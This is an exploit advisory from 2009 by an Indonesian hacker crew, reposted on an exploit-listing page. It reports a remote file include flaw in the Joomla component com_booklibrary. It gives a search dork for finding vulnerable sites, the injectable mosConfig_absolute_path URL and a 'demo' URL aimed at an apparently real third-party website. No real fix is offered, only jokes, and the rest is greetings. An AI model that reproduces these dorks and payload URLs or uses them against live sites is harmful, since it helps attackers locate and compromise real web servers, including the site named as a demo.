|    |    |    | Today: 20-Sep-2019 |

Joomla Component com_booklibrary Remote File Include vulnerability

October 20, 2009 | Posted in ExploitAlert

#############################################################################################################
## Joomla Component com_booklibrary Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@gmail.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 27, 2009 ##
#############################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.joomlawebserver.com/
[+] Download : http://www.joomlawebserver.com/extensions/index.php
[+] version : 1.0
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_booklibrary"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]

[ BUG IN ]

releasenote.php

got error ;)

require('./components/com_booklibrary/admin.booklibrary.class.conf.php');

[ DEMO ]

http://www.fila-brasileiro.pl/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=[kaMtiEz RoX]

[ FIX ]

Tukulesto said : ask to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae

Joke.. ;)
#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] ditinggal tidur ama om tukulesto .. ga ada temen .. untung aje tetep ada hasil ;)

Taged in: booklibrary, component, include, Joomla, Remote, vulnerability